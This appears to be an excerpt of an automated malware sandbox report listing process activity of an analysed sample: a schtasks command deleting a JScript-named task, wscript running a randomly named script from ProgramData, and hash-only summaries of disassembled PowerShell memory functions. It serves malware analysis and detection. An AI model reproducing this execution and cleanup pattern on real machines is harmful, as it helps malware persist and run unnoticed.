                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:22
                                              Start time:03:16:05
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
                                              Imagebase:0x7ff67e450000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:23
                                              Start time:03:16:05
                                              Start date:03/12/2024
                                              Path:C:\Windows\System32\wscript.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
                                              Imagebase:0x7ff6b33f0000
                                              File size:170'496 bytes
                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFD34960E8E Relevance: .1, Instructions: 60COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2198713431.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d25c268451c242967042adb56512a8b85c5d9f0c7081f627061d8511eb037f50
                                                • Instruction ID: 617b3dc664ac6ac433c5cd5584092e08d56757e2b90e12da801f55571d1f8f61
                                                • Opcode Fuzzy Hash: d25c268451c242967042adb56512a8b85c5d9f0c7081f627061d8511eb037f50
                                                • Instruction Fuzzy Hash: 86019222F0EE5A0FEBA6E66C14F927866C2EF9523075904BEE50DC31D7EE1DAC059350
                                                Function 00007FFD349611B4 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2198713431.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f6022854529c8e5d2c478ea4207d5f94cc50b56019211640508798220f3d923
                                                • Instruction ID: 2bfcd024e5fe59da9c5096af00ec74d059f92a232db13cd7239b7d455ac0b65d
                                                • Opcode Fuzzy Hash: 5f6022854529c8e5d2c478ea4207d5f94cc50b56019211640508798220f3d923
                                                • Instruction Fuzzy Hash: 7701F532F0EA454FEB5DA69C54A20B872D1FF8633074400BEE24DC2197DD2EAC458704
                                                Function 00007FFD34894575 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2197447827.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 94b56fdebe38f4091b5f4d14db650b3dc458cea6429c722bb5174eba508e340c
                                                • Instruction ID: 975b63e12e5148fcff4f2edbeff9d473561ff7d896fc340853215290866a887b
                                                • Opcode Fuzzy Hash: 94b56fdebe38f4091b5f4d14db650b3dc458cea6429c722bb5174eba508e340c
                                                • Instruction Fuzzy Hash: F901677121CB0C8FD744EF4CE451AA5B7E0FB99364F10056EE58AC3651DA36E881CB45

                                                Non-executed Functions

                                                Function 00007FFD34894C23 Relevance: .2, Instructions: 199COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2197447827.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 92355e20f63cc21cc2044801b9a74a41742f8cef01fd4108fc9b7393f4cfe715
                                                • Instruction ID: aa7b649d7d8036e8df23b5dedfb199a4f660a0b1a3db942092b81e539d0ab38c
                                                • Opcode Fuzzy Hash: 92355e20f63cc21cc2044801b9a74a41742f8cef01fd4108fc9b7393f4cfe715
                                                • Instruction Fuzzy Hash: 5351810BB0DFD62FF762537C18B60EA6FD4DF53665B0D12B6CAC4CA093AD5C2806A251
                                                Function 00007FFD3489495D Relevance: .2, Instructions: 158COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2197447827.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5aae2f965672b6af99d7afb7a9a01f1bf33417cef0e41566bf6c826f6cf092d
                                                • Instruction ID: 8895f1c748895bcc3c431ba6eaea4611f82e80cbb1c03680ff59753ed57e9f56
                                                • Opcode Fuzzy Hash: e5aae2f965672b6af99d7afb7a9a01f1bf33417cef0e41566bf6c826f6cf092d
                                                • Instruction Fuzzy Hash: 62419147B1EBD22BF652926C6CF60D93FD0DE9367570910F7C384CA093AD0D280BA266

                                                Executed Functions

                                                Function 00007FFD348933B5 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2438639968.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_7ffd34890000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                • Instruction ID: ae605e7e7b896741c28386b595f310dc01aebb4b8afea9650844b96dbb4c98a5
                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                • Instruction Fuzzy Hash: A401A73020CB0C4FD744EF0CE451AA6B7E0FB89320F10052DE58AC3651DA36E882CB41